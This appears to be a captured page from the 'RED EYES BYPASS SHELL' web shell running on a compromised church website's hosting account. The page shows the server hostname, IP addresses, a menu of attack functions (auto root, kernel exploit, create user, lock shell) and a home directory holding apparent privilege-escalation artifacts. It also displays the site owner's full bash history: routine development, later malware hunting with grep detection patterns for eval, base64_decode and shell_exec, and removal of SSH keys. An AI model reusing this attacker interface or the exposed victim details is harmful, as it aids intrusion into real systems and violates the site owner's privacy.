Linux webm007.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.106.20.7 | : 216.73.217.26
Cant Read [ /etc/named.conf ]
eglisebaa
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
eglisebaa /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
.pkexec
[ DIR ]
drwxr-xr-x
.ssh
[ DIR ]
drwx------
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
demo
[ DIR ]
dr-xr-xr-x
ssl
[ DIR ]
drwxr-xr-x
www
[ DIR ]
drwx---r-x
.bash_history
17.05
KB
-rw-------
.bash_logout
24
B
-rw-r--r--
.bash_profile
236
B
-rw-r--r--
.bashrc
131
B
-rw-r--r--
.forward
35
B
-rw-------
.htaccess
221
B
-rw----r--
.ovhconfig
105
B
-rw----r--
.ovhconfig.backup-20260114-145705
106
B
-rw----r--
.red_eyes_root
0
B
-rw-r--r--
.viminfo
5.85
KB
-rw-------
.wget-hsts
168
B
-rw-r--r--
6digits.sh
1.44
KB
-rwx--xr-x
diagnostic-serveur.sh
9.44
KB
-rwxr-xr-x
fichiers_modifies.csv
11.33
KB
-rw-r--r--
nettoyage-backdoors-supplementaires.sh
2.38
KB
-rwxr-xr-x
nettoyage-index.php.sh
1.07
KB
-rwxr-xr-x
plan-mises-a-jour.sh
2.22
KB
-rwxr-xr-x
redeyes
10.99
KB
-rwxr-xr-x
scan-complet.sh
10.77
KB
-rwxr-xr-x
verification-mises-a-jour.sh
5.09
KB
-rwxr-xr-x
Code Editor : .bash_history
cd www/presenceFloirac/ #1598392478 ls -la #1598392573 php accesSpreadsheet.php #1598392593 php accesSpreadsheet.php #1598392744 php accesSpreadsheet.php #1598392945 php accesSpreadsheet.php #1598393107 php accesSpreadsheet.php #1598393298 php spreadsheet.php #1598425717 cd www/presenceFloirac/ #1598425720 php scriptCRON.php #1598425904 ls #1598425905 cd #1598425907 ls #1598425908 cd / #1598425910 ls #1598425915 cd ~ #1598425916 ls #1598425921 cd .. #1598425922 ls #1598425925 cd .. #1598425926 ls #1598425939 cd ~ #1598425940 ls #1598426026 cd www/presenceFloirac/ #1598426029 php spreadsheet.php #1598426070 php accesSpreadsheet.php #1598426787 cd www/presenceFloirac/ #1598426790 php scriptCRON.php #1598427522 cd www/presenceFloirac/ #1598427532 ls #1598427577 cp scriptCRON.php scriptCRON-withoutrestriction.php #1598427618 ls -l #1598427670 cd .. #1598427672 ls -a #1598427676 ls -l #1598427733 d presenceFloirac/ #1598427736 cd presenceFloirac/ #1598427737 ls #1598427745 vi index.html #1598427901 cd .. 
#1598427908 chmod -R 705 presenceFloirac/ #1598427918 ls -la #1598427976 cd presenceFloirac/ #1598427987 php spreadsheet.php #1598428028 php accesSpreadsheet.php #1598428667 cd www/presenceFloirac/ #1598428696 ls -la #1598615657 cd www/presenceFloirac/ #1598625986 cd www/presenceFloirac/ #1598625991 php index.php #1598626262 exit #1598626629 cd www/presenceFloirac/ #1598626635 php index.php #1598626702 exit #1598646598 cd www/presenceFloirac/ #1598646626 php redirect.php #1598646687 php presence.html #1598646693 php index.php #1598646738 php index.php #1598646811 php index.php #1598646827 php index.php #1598646869 exit #1598647824 cd www/presenceFloirac/ #1598647831 php /usr/lib/php index.php #1598647840 whereis php #1598647852 php /usr/local/bin/php index.php #1598647894 php /usr/local/bin/php index.php #1598647900 php /usr/local/bin/php index.php #1598647910 php /usr/local/bin/php index.php #1598647912 php /usr/local/bin/php index.php #1598648148 php /usr/local/bin/php index.php #1598648160 php index.php #1598648184 php index.php #1598648203 php redirect.php #1598648215 php presence.html #1598648382 curl http://www.eglisebaptistefloirac.fr/presenceFloirac/index.php #1598648438 curl http://www.eglisebaptistefloirac.fr/presenceFloirac/redirect.php #1598648546 exit #1598650473 cd www/presenceFloirac/ #1598650478 php index.php #1598650566 php index.php #1598650622 php index.php #1598650976 cd www/presenceFloirac/ #1598650981 php index.php #1598651015 php index.php #1598651096 php index.php #1598651129 php index.php #1598651150 php index.php #1598651356 php index.php #1598651595 php index.php #1598651747 php index.php #1598651779 php index.php #1598651924 php index.php #1598652174 php index.php #1598652205 php index.php #1598652229 php index.php #1598652274 php index.php #1598652320 php index.php #1598652379 php index.php #1598652393 php index.php #1598652406 php index.php #1598652427 php index.php #1598652461 php index.php #1598652507 php index.php #1598652537 php 
index.php #1598652554 php index.php #1598652586 php index.php #1598652643 php index.php #1598652799 php index.php #1598652842 php index.php #1598653035 php index.php #1598653059 php index.php #1598653060 ls #1598653089 ls #1598653091 php index.php #1598653135 php index.php #1598653142 php index.php #1598653163 php index.php #1598653178 php index.php #1598653188 php index.php #1598653192 ls #1598653204 php index.php #1598653217 php index.php #1598653236 php index.php #1598653275 php index.php #1598653294 php index.php #1598653677 cd www/presenceFloirac/ #1598653680 php index.php #1598653689 ls #1598653695 vim cat.out #1598653838 php index.php #1598653853 php index.php #1598653959 php index.php #1598653978 php index.php #1598654066 php index.php #1598654099 php index.php #1598654113 php index.php #1598654144 php index.php #1598654188 php index.php #1598654211 php index.php #1598654242 php index.php #1598654282 php index.php #1598654339 php index.php #1598654355 php index.php #1598654506 php index.php #1598654513 php index.php #1598654561 php index.php #1598654566 php index.php #1598654595 php index.php #1598654602 php index.php #1598654615 php index.php #1598654617 php index.php #1598654638 php index.php #1598654707 php index.php #1598655053 cd www/presenceFloirac/ #1598655055 php index.php #1598656159 cd www/presenceFloirac/ #1598656162 php index.php #1598656292 php index.php #1598656345 php index.php #1598656352 php index.php #1598656367 php index.php #1598656399 php index.php #1598656410 php index.php #1598656447 php index.php #1598656461 php index.php #1598656470 php index.php #1598656496 php index.php #1598726924 python -m webbrowser https://stackoverflow.com #1598727134 ls #1598727138 cd www/presenceFloirac/ #1598727139 #1598727182 python -m webbrowser http://www.eglisebaptistefloirac.fr/presenceFloirac/presence.html #1598727462 vi index.php #1598727490 vi index.php #1598727527 python -m webbrowser 
http://www.eglisebaptistefloirac.fr/presenceFloirac/presence.html #1598729267 cd www/presenceFloirac/ #1598729307 touch AccesSpreadsheet.php #1598729352 php AccesSpreadsheet.php #1598729389 php -d display_errors=on AccesSpreadsheet.php #1598729399 php --help #1598729583 php AccesSpreadsheet.php -l #1598729684 php -d display_all AccesSpreadsheet.php #1598729691 php -d display_all=on AccesSpreadsheet.php #1598729697 php -d display_errors=on AccesSpreadsheet.php #1598729810 php AccesSpreadsheet.php #1598729843 rm AccesSpreadsheet.php #1598729850 php accesSpreadsheet.php #1598729863 php -d display_errors=on accesSpreadsheet.php #1598736760 php -d display_errors=on accesSpreadsheet.php #1598736766 cd www/presenceFloirac/ #1598736767 php -d display_errors=on accesSpreadsheet.php #1598736845 vi accesSpreadsheet.php #1598736932 vi accesSpreadsheet.php #1598736937 php -d display_errors=on accesSpreadsheet.php #1598737042 exit #1598737674 cd www/presenceFloirac/ #1598737680 php -d display_errors=on accesSpreadsheet.php #1598737700 php --version #1598737876 ls #1598737887 cd vendor/guzzlehttp/guzzle/ #1598737897 ls #1598737907 cd build/ #1598737908 ls #1598737910 cd .. #1598737913 cd src/ #1598737913 ls #1598737927 cd Exception/ #1598737928 ls #1598737941 vi ConnectException.php #1598737959 cd ../../../.. #1598737961 ls #1598737967 cd guzzlehttp/ #1598737968 ls #1598737976 cd promises/ #1598737977 ls #1598737980 cd src/ #1598737980 ls #1598737988 cd ../.. #1598737992 cd psr7/ #1598737993 ls #1598737995 cd src/ #1598737996 ls #1598738003 cd .. #1598738019 cd .. #1598738029 cd guzzle/src/Exception/ #1598738030 ls #1598738038 vi ConnectException.php #1598738244 cd .. 
#1598738246 ls #1598738266 cd Handler #1598738285 vi CurlFactory.php #1598738572 python -m webbrowser https://stackoverflow.com #1598738594 python -m webbrowser http://www.eglisebaptistefloirac.fr/presenceFloirac/presence.html #1598738670 python -mwebbrowser http://example.comhttp://www.eglisebaptistefloirac.fr/presenceFloirac/presence.html #1598738685 python -mwebbrowser http://www.eglisebaptistefloirac.fr/presenceFloirac/presence.html #1598738697 python --help #1598738814 xdg-open http://www.eglisebaptistefloirac.fr/presenceFloirac/presence.html #1598738858 cygstart http://www.eglisebaptistefloirac.fr/presenceFloirac/presence.html #1598738882 man #1598738909 python http://www.eglisebaptistefloirac.fr/presenceFloirac/presence.html #1598738953 google-chrome http://www.eglisebaptistefloirac.fr/presenceFloirac/presence.html #1598739108 which php #1598739184 curl http://www.eglisebaptistefloirac.fr/presenceFloirac/presence.html #1598739229 curl http://www.google.fr #1598739494 php -v #1598739635 apt install libapache2-mod-php php-curl #1598739688 curl http://www.google.fr --ipv4 #1598739723 curl --ipv4 http://www.google.fr #1598740133 cd www/presenceFloirac/ #1598740141 touch phpinfo.php #1598740143 vi #1598740181 vi phpinfo.php #1598740213 php phpinfo.php #1598740261 touch curl.php #1598740363 php curl.php #1598740473 php -d display_errors=on redirect.php #1598740788 wget --version #1598740826 wget -O -q http://www.eglisebaptistefloirac.fr/presenceFloirac/index.php #1598740868 wget -O -q http://www.eglisebaptistefloirac.fr/presenceFloirac/presence.html #1598740951 php -f http://www.eglisebaptistefloirac.fr/presenceFloirac/index.php #1598740990 wget http://www.eglisebaptistefloirac.fr/presenceFloirac/index.php #1598743741 cd www/presenceFloirac/ #1598743746 php curl.php #1598743839 php curl.php #1598743843 php curl.php #1598799125 cd www/presenceFloirac/ #1598799126 ls #1598799128 ls -l #1598799161 rm accesSpreadsheet.php cat.out curl.php 
scriptCRON-withoutrestriction.php #1598799162 ls #1598799166 ls -l #1598894718 cd www/presenceFloirac/ #1598894720 vi index.php #1598894781 vi index.php #1598894838 vi index.php exit #1598894868 ls #1598894874 exit #1599077493 exit #1599163432 cd www/presenceFloirac/ #1599163434 vi functions.php #1599163591 vi functions.php #1599163608 vi functions.php #1599163828 vi index.php #1599163869 exit #1599164551 cd www/presenceFloirac/ #1599164554 vi index.php #1599164565 vi functions.php #1599164620 vi env.php #1753521269 ls #1753521274 cd www #1753521288 grep -r --include=*.php "base64_decode" . #1753521313 grep -r --include=*.php "eval(" . #1753521317 grep -r --include=*.php "gzinflate" . #1753521359 grep -r --include=*.php "base64_decode" . #1753521366 grep -r --include=*.php "eval(" . #1753521366 grep -r --include=*.php "gzinflate" . #1753521424 grep -rl --include="*.php" -e "base64_decode" -e "eval(" -e "gzinflate" -e "shell_exec" -e "system(" -e "passthru(" -e "preg_replace.*\/e" -e "exec(" -e "assert(" -e "str_rot13" -e "ob_start" -e "phpinfo" . #1753521451 grep -rl --include="*.php" -e "base64_decode" -e "eval(" -e "gzinflate" -e "shell_exec" -e "system(" -e "passthru(" -e "preg_replace.*\/e" -e "exec(" -e "assert(" -e "str_rot13" -e "ob_start" -e "phpinfo" ./ #1753522190 find . -type f -printf "%T@ %p\n" | sort -nr | cut -d' ' -f2- #1753522283 find . -type f -printf '%TY-%Tm-%Td %TH:%TM:%TS %p\n' | sort -r | head -n 100 #1753522344 find . -type f -printf '%TY-%Tm-%Td %TH:%TM:%TS %p\n' | sort -r | head -n 1000 #1753545677 ls #1753545714 cd www #1753545716 find . -type f -printf '%TY-%Tm-%Td %TH:%TM:%TS %p\n' | sort -r | head -n 100 #1753545748 find . -type f -printf '%TY-%Tm-%Td %TH:%TM:%TS %p\n' | sort -r | head -n 1000 > URL.txt #1753545832 { echo "date_modification,chemin_fichier"; find . -type f -printf '%TY-%Tm-%Td %TH:%TM:%TS,%p\n' | sort -r | head -n 100; } > fichiers_modifies.csv #1753545949 { echo "date_modification;chemin_fichier"; find . 
-type f -printf '%TY-%Tm-%Td %TH:%TM:%TS;%p\n' | sort -r | head -n 1000; } > fichiers_modifies.csv #1753546451 cd www #1753546470 chmod +x resultatBackdoor.sh #1753546477 ./resultatBackdoor.sh #1753546617 ./resultatBackdoor.sh #1753546621 chmod +x resultatBackdoor.sh #1753546623 ./resultatBackdoor.sh #1753546685 { echo "date_modification;chemin_fichier"; find . -type f -printf '%TY-%Tm-%Td %TH:%TM:%TS;%p\n' | sort -r | head -n 1000; } > fichiers_modifies.csv #1753546707 ./resultatBackdoor.sh #1753546781 ./resultatBackdoor.sh #1753546784 chmod +x resultatBackdoor.sh #1753546786 ./resultatBackdoor.sh #1753546803 ./resultatBackdoor.sh #1753546806 chmod +x resultatBackdoor.sh #1753546807 ./resultatBackdoor.sh #1753546815 chmod +x resultatBackdoor.sh #1753546816 ./resultatBackdoor.sh #1753546829 pwd #1753546840 chmod +x resultatBackdoor.sh #1753546842 ./resultatBackdoor.sh #1753546877 tail -n +2 fichiers_modifies.csv | while IFS=',' read -r date fichier; do echo "[$date] [$fichier]"; done #1753546929 chmod +x resultatBackdoor.sh #1753546931 ./resultatBackdoor.sh #1753547061 cat resultats_backdoor.txt #1753548015 grep -r "wCuHkrT" /homez.742/eglisebaa/www/ #1753548702 grep -r "70121990" /homez.742/eglisebaa/www/ #1753690081 find . -type f -printf "%T@,%Tc,%p\n" | sort -nr | head -n 100 > fichiers_modifies.csv #1753690105 qfind . -type f -printf "%T@,%Tc,%p\n" | sort -nr | head -n 500 #1753690114 find . -type f -printf "%T@,%Tc,%p\n" | sort -nr | head -n 500 #1753690727 find . -type f -printf "%T@,%Tc,%p\n" | sort -nr | head -n 500 #1753691031 ls #1753691047 cd ssl #1753691048 ls #1753691050 cd .. #1753691055 rm demo #1753691065 sudo rm demo #1753691075 rm demo -rf #1753691085 ls #1753691087 cd demo #1753691089 ls #1753691094 rm * #1753691155 rm -rf #1753691158 ls #1753691174 cd ;; #1753691177 cd .. 
#1753691185 rm demo -rf #1753691216 sudo rm demo -rf #1753691244 su rm demo -rf #1753783431 cd www #1753783443 cd wp-content/ #1753783444 ls #1753783450 cd uploads/ #1753783452 ls #1753783501 cd ac_assets/ #1753783502 ls #1753783506 cd #1753783508 cd www #1753783516 ls www-joomla/ #1753783562 find /chemin/du/répertoire -type f | wc -l #1753783592 find /www/www-joomla -type f | wc -l #1753783601 find /www-joomla -type f | wc -l #1753783607 find www-joomla -type f | wc -l #1753783615 find www-joomla -type f | wc -l #1753783625 find www-joomla -type f | wc -l #1753783706 find www-joomla -type f | wc -l #1753783755 find www-joomla -type f | wc -l #1753783778 find www-joomla -type f | wc -l #1753783857 find www-joomla -type f | wc -l #1753783923 find www-joomla -type f | wc -l #1753783970 find www-joomla -type f | wc -l #1753783989 find www-joomla -type f | wc -l #1753784009 find www-joomla -type f | wc -l #1753784065 find www-joomla -type f | wc -l #1753784119 find www-joomla -type f | wc -l #1753784134 find www-joomla -type f | wc -l #1753784164 find www-joomla -type f | wc -l #1753784168 find www-joomla -type f | wc -l #1753784175 find www-joomla -type f | wc -l #1753784179 find www-joomla -type f | wc -l #1753784181 find www-joomla -type f | wc -l #1753784187 ls #1753784190 cd .. #1753784190 ls #1753784198 rm demo/ #1753784209 find demo -type f | wc -l #1753804186 cd www #1753804198 cd wp-admin/ #1753804198 ll #1753804203 ls -la #1753823600 cd www/wp-content/uploads/ #1753823646 cd 2025 #1753823647 find . -type f -iname "*.mp3" -printf "%T@ %p\n" | sort -n | cut -d' ' -f2- #1753824329 cd www/wp-content/uploads/2025 #1753824330 find . 
-type f -iname "*.mp3" -printf "%T@ %p\n" | sort -n | cut -d' ' -f2- #1753824565 cd #1753824580 cd /home/eglisebaa/www/wp-content/plugins/elementor/modules/system-info/reporters/ #1753824582 ll #1753824585 ls -l #1753824600 sudo chmod 644 user.php #1753824602 ls -l #1753824622 chmod 644 user.php #1753824624 ls -l #1753824695 cd /home/eglisebaa/www/wp-content/plugins/elementor/core/files/ #1753824697 ls -l #1753824715 chmod 644 uploads-manager.php #1753824717 ls -l #1753824727 cd ../dynamic-tags/ #1753824730 ls -l #1753824745 chmod 644 manager.php #1753824747 ls -l #1753871595 ls #1753871597 cd www #1753871611 cd wp-content/ #1753871617 cd cache/ #1753871619 ls #1753871628 cd.. #1753871629 rm -rf wp-content/cache/* #1753871629 rm -rf wp-content/uploads/cache/* #1753871629 rm -rf wp-content/wpo-cache/* #1753871634 ll #1753871636 ls #1753871638 cd .. #1753871645 rm -rf wp-content/cache/* #1753871648 rm -rf wp-content/cache/* #1753871658 cd .; #1753871660 cd .. #1753871663 rm -rf wp-content/cache/* #1753871683 rm -rf wp-content/uploads/cache/* #1753871693 rm -rf wp-content/wpo-cache/* #1753871697 cd cach #1753871836 exit #1753873801 grep -ri "sitemap" /homez.742/eglisebaa/www #1753873868 grep -ril "sitemap" /homez.742/eglisebaa/www #1756113686 find . -type f -iname "*.mp3" -exec stat -f "%m %N" {} \; | sort -n | cut -d' ' -f2- #1756113737 find . -type f -iname "*.mp3" -printf "%T@ %TY-%Tm-%Td %TH:%TM:%TS %p\n" | sort -n #1756114062 find . -type f -iname "*.mp3" -printf "%T@ %TY-%Tm-%Td %TH:%TM:%TS %p\n" | sort -n #1761757627 cd www #1761757629 ls #1761757636 cd .. #1761757642 mv www/6digits.sh . 
#1761757648 chmod +x 6digits.sh #1761757656 ./6digits.sh www #1761757676 ./6digits.sh www -d -y #1761757679 ./6digits.sh www #1761758460 ls #1761758463 cd www/ #1761758464 ls #1761758473 cd wp-content/ #1761758474 ls #1761758478 rm debug.log #1761758515 rm debug.log #1761758570 ls #1761758573 rm debug.log #1761758574 ls #1763976430 ls #1763976485 find www -type f -printf "%T@ %p\n" | sort -nr | cut -d' ' -f2- #1763976519 find www -type f -printf '%TY-%Tm-%Td %TH:%TM:%TS %p\n' | sort -r | head -n 50 #1763976611 find www -type d -path "www/wp-content/cache" -prune -o -type f -printf '%TY-%Tm-%Td %TH:%TM:%TS %p\n' | sort -r | head -n 50 #1763976875 find www -type d -path "www/wp-content/cache" -prune -o -type f -printf '%TY-%Tm-%Td %TH:%TM:%TS %p\n' | sort -r | head -n 150 #1768144591 exit #1768144755 ssh-copy-id eglisebaa@ssh.cluster006.hosting.ovh.net #1768144758 exit #1768144794 exit #1768144805 exit #1768145062 exit #1768145143 exit #1768145149 exit #1768145158 exigt #1768145161 exit #1768145211 exit #1768145224 exit #1768145361 exit #1768145415 ls .ssh/ #1768145417 ls #1768145421 cd .ssh/ #1768145422 ls #1768145424 cd authorized_keys #1768145424 ls #1768145435 cat authorized_keys #1768145448 exit #1768145478 cd .ssh/ #1768145479 ls #1768145481 rm authorized_keys #1768145483 ls #1768145485 exit #1768145543 exit #1768145609 exit #1768145626 exit #1769874691 exit #1769874709 exit #1769936741 exit #1769936757 exit #1769937172 exit